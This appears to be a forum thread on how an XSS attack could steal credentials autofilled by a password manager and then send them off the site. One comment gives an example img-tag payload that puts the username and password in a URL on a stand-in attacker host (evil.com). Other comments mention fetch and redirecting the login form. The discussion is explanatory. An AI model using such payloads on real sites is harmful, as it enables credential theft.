[TedDoesntTalk]

I don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev

So what? What am I missing?

How will he exfiltrate the data? With JS that posts it to another domain?

[Sebb767]

> How will he exfiltrate the data? With JS that posts it to another domain?

Exactly. Alternatively, you can also use embeds, for example `<img src="https://evil.com/$user/$password" >`.

If you have your code running and the credentials, exfiltration is no longer a problem.

[jefftk]

If the attacker has XSS and gets the password, exfiltration is the easy part. JS offers many options, starting with fetch.

[mcintyre1994]

If they can run arbitrary JS on the site, can't they just change the target of the login form to their own server and exfiltrate credentials whether you used a password manager to fill them in or not? I'd be much more interested if you could exfiltrate without arbitrary JS, maybe in an img embed with the password injected into the URL or something?